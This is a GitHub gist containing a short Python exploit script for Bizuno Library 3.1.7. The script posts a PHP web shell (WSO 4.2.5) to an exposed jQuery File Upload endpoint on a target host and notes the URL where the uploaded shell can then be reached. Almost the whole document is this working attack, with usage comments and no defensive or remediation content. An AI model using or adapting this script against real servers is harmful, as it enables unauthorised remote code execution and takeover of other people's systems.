Skip to content

Instantly share code, notes, and snippets.

@islanddog
Created May 18, 2020 19:03
Show Gist options
  • Save islanddog/86a78eaa7d036c313d6c3d73c75b94e4 to your computer and use it in GitHub Desktop.
Save islanddog/86a78eaa7d036c313d6c3d73c75b94e4 to your computer and use it in GitHub Desktop.
Bizuno Library 3.1.7 - JQuery File Upload Script
#!/usr/bin/python
import requests
# Host IP http://IP
host='Put IP HERE'
# JQuery path for Bizuno Library 3.1.7
url=host+'/Books/apps/jquery-file-upload/server/php/index.php'
# Uploading the shell to the server. I use wso-4.2.5.php in this example:
files = {'files': open('wso-4.2.5.php', 'rb')}
r = requests.post(url, files=files)
# Location of Shell/Name - wso.php
shellloc=host+'/Books/apps/jquery-file-upload/server/php/files/wso.php'
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment